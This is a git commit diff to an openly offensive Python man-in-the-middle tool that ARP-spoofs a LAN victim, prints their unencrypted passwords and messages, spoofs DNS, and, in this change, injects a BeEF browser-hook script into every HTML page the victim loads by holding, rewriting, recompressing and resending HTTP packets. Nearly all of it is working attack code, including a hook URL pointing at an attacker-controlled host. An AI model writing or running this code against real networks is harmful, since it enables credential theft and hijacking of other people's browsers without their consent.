beef hooking more reliable

This commit is contained in:
DanMcInerney 2013-11-03 04:55:33 -07:00
parent c383dcf4b7
commit f38236290e
2 changed files with 44 additions and 43 deletions

View file

@ -3,7 +3,7 @@ intercept
Individually arpspoofs the target box, router and DNS server if necessary. Displays all most the interesting bits of their traffic. Cleans up after itself. Individually arpspoofs the target box, router and DNS server if necessary. Displays all most the interesting bits of their traffic. Cleans up after itself.
Prereqs: Linux, scapy, python nfqueue-bindings, aircrack-ng, python twisted Prereqs: Linux, scapy, python nfqueue-bindings, aircrack-ng, python twisted, BeEF (option)
Example usage as root: Example usage as root:
python intercept.py -u -p -d -ip 192.168.0.10 python intercept.py -u -p -d -ip 192.168.0.10
@ -37,6 +37,9 @@ python intercept.py -h
-na, performs an aggressive nmap scan in the background and outputs to [victim IP address].nmap.txt -na, performs an aggressive nmap scan in the background and outputs to [victim IP address].nmap.txt
-b BEEF_HOOK_URL, copy the BeEF hook URL to inject it into every page the victim visits, eg: -b http://192.168.1.10:3000/hook.js
Cleans the following on Ctrl-C: Cleans the following on Ctrl-C:
@ -47,6 +50,7 @@ Cleans the following on Ctrl-C:
individually restore each machine's ARP table individually restore each machine's ARP table
To do: To do:
Add ability to read from pcap file Add ability to read from pcap file

View file

@ -1,10 +1,6 @@
#!/usr/bin/python #!/usr/bin/python
''' '''
Description: MITMs another LAN client and prints all the interesting unencrypted info like passwords and messages. Asynchronous multithreaded arp spoofing packet parser. Description: MITMs another LAN client and prints all the interesting unencrypted info like passwords and messages. Asynchronous multithreaded arp spoofing packet parser.
Author: Dan McInerney
Contact: danhmcinerney gmail
Prerequisites: Linux Prerequisites: Linux
nmap (optional) nmap (optional)
nbtscan (optional) nbtscan (optional)
@ -16,6 +12,13 @@ Prerequisites: Linux
Note: This script flushes iptables before and after usage. Note: This script flushes iptables before and after usage.
''' '''
__author__ = 'Dan McInerney'
__license__ = 'GPL'
__email__ = 'danhmcinerney with gmail'
__version__ = 1.0
####################################################################
import logging import logging
logging.getLogger("scapy.runtime").setLevel(logging.ERROR) logging.getLogger("scapy.runtime").setLevel(logging.ERROR)
@ -103,7 +106,7 @@ class Parser():
catch_pkts = 0 catch_pkts = 0
full_pkt = '' full_pkt = ''
full_load = '' full_load = ''
drop_load = [] drop_body = []
start_time = 0 start_time = 0
def start(self, payload): def start(self, payload):
@ -123,14 +126,6 @@ class Parser():
sport = pkt[TCP].sport sport = pkt[TCP].sport
ack = pkt[TCP].ack ack = pkt[TCP].ack
load = pkt[Raw].load load = pkt[Raw].load
#################################################
if sport == 80:
# for x in self.drop_load:
# if load == x:
# payload.set_verdict(nfqueue.NF_DROP)
# return
self.beef(load, ack, pkt, payload)
#################################################
mail_ports = [25, 26, 110, 143] mail_ports = [25, 26, 110, 143]
if dport in mail_ports or sport in mail_ports: if dport in mail_ports or sport in mail_ports:
self.mailspy(load, dport, sport, IP_dst, IP_src, mail_ports, ack) self.mailspy(load, dport, sport, IP_dst, IP_src, mail_ports, ack)
@ -140,6 +135,8 @@ class Parser():
self.ftp(load, IP_dst, IP_src) self.ftp(load, IP_dst, IP_src)
if dport == 80 or sport == 80: if dport == 80 or sport == 80:
self.URL(load, ack, dport, sport) self.URL(load, ack, dport, sport)
if sport == 80 and args.beef:
self.beef(load, ack, pkt, payload)
if args.dnsspoof: if args.dnsspoof:
if pkt.haslayer(DNSQR): if pkt.haslayer(DNSQR):
dport = pkt[UDP].dport dport = pkt[UDP].dport
@ -149,36 +146,38 @@ class Parser():
dns_layer = pkt[DNS] dns_layer = pkt[DNS]
self.dnsspoof(dns_layer, IP_src, IP_dst, sport, dport, localIP, payload) self.dnsspoof(dns_layer, IP_src, IP_dst, sport, dport, localIP, payload)
#################################################
def beef(self, load, ack, pkt, payload): def beef(self, load, ack, pkt, payload):
current_time = time.time() heads = 0
############### Maybe test the next packet for having headers. If it does, then block it and inject? try:
if self.catch_pkts == 1 and current_time > self.start_time + 1: headers, body = load.split("\r\n\r\n", 1)
for x in self.drop_load: heads = 1
if load == x: except:
print '[-] load found in drop_load list' pass
payload.set_verdict(nfqueue.NF_DROP) if self.catch_pkts == 1:
break if heads == 1 or ack != self.oldBEEFack:
self.inject() heads = 0
self.catch_pkts = 0
self.inject()
if self.catch_pkts == 1 and self.oldBEEFack == ack and self.oldBEEFack != 0: if self.catch_pkts == 1 and self.oldBEEFack == ack and self.oldBEEFack != 0:
self.full_data = self.full_data+load self.full_data = self.full_data+load
print '[+] Added data to the BeEF queue' print '[+] Added data to the BeEF packet'
payload.set_verdict(nfqueue.NF_DROP) payload.set_verdict(nfqueue.NF_DROP)
return return
if 'Content-Type: text/html' in load and self.catch_pkts == 0: if 'Content-Type: text/html' in load and self.catch_pkts == 0:
self.start_time = time.time()
print '[+] HTML packet found, starting BeEF queue' print '[+] HTML packet found, starting BeEF queue'
self.drop_load.append(load)
self.oldBEEFack = ack self.oldBEEFack = ack
self.full_pkt = pkt self.full_pkt = pkt
self.full_data = load self.full_data = load
self.server = pkt[IP].src self.server = pkt[IP].src
self.catch_pkts = 1 self.catch_pkts = 1
payload.set_verdict(nfqueue.NF_DROP) payload.set_verdict(nfqueue.NF_DROP)
return
def inject(self): def inject(self):
url = '<script src='+args.beef+'></script> '
html = '<script src='+args.beef+'></script> '
body_found = 0
if self.full_pkt != '' and self.full_data != '': if self.full_pkt != '' and self.full_data != '':
try: try:
@ -197,27 +196,30 @@ class Parser():
print '[-] Could not decompress body of packet' print '[-] Could not decompress body of packet'
self.full_data = '' self.full_data = ''
self.full_pkt = '' self.full_pkt = ''
self.catch_pkts = 0
self.oldBEEFack = 0 self.oldBEEFack = 0
return return
if '<html' in body: if '<html' in body or '/html>' in body:
psplit = str(body).split('<head>')
try: try:
body = psplit[0]+'<head> '+url+psplit[1] psplit = str(body).split('</head>')
body = psplit[0]+html+'</head>'+psplit[1]
except: except:
print '[-] <head> not found in load' print '[-] </head> not found in load'
try: try:
psplit = str(body).split('</head>') psplit = str(body).split('<head>')
body = psplit[0]+url+'</head>'+psplit[1] body = psplit[0]+'<head>'+html+psplit[1]
except: except:
print '[-] </head> not found in load' print '[-] Failed to inject html'
self.full_data = '' self.full_data = ''
self.full_pkt = '' self.full_pkt = ''
self.catch_pkts = 0
self.oldBEEFack = 0 self.oldBEEFack = 0
return return
# For debugging
# fp = open(str(self.oldBEEFack)+'.html', 'wb')
# fp.write(headers+"\r\n\r\n"+body)
# fp.close
# Recompress data if necessary # Recompress data if necessary
if 'Content-Encoding: gzip' in headers: if 'Content-Encoding: gzip' in headers:
try: try:
@ -229,7 +231,6 @@ class Parser():
except: except:
self.full_data = '' self.full_data = ''
self.full_pkt = '' self.full_pkt = ''
self.catch_pkts = 0
self.oldBEEFack = 0 self.oldBEEFack = 0
print '[-] Could not recompress html' print '[-] Could not recompress html'
@ -239,7 +240,6 @@ class Parser():
print '[-] Could not split headers at Content-Length\n' print '[-] Could not split headers at Content-Length\n'
self.full_data = '' self.full_data = ''
self.full_pkt = '' self.full_pkt = ''
self.catch_pkts = 0
self.oldBEEFack = 0 self.oldBEEFack = 0
return return
httpnewlength = str(len(headers+"\r\n\r\n"+body)) httpnewlength = str(len(headers+"\r\n\r\n"+body))
@ -250,14 +250,11 @@ class Parser():
del self.full_pkt[IP].chksum del self.full_pkt[IP].chksum
del self.full_pkt[TCP].chksum del self.full_pkt[TCP].chksum
catch_pkts = 0
send(self.full_pkt) send(self.full_pkt)
print '[!] Sent injected packet' print '[!] Sent injected packet'
self.full_data = '' self.full_data = ''
self.full_pkt = '' self.full_pkt = ''
self.catch_pkts = 0
self.oldBEEFack = 0 self.oldBEEFack = 0
#################################################
# Spoof DNS for a specific domain to point to your machine # Spoof DNS for a specific domain to point to your machine
def dnsspoof(self, dns_layer, IP_src, IP_dst, sport, dport, localIP, payload): def dnsspoof(self, dns_layer, IP_src, IP_dst, sport, dport, localIP, payload):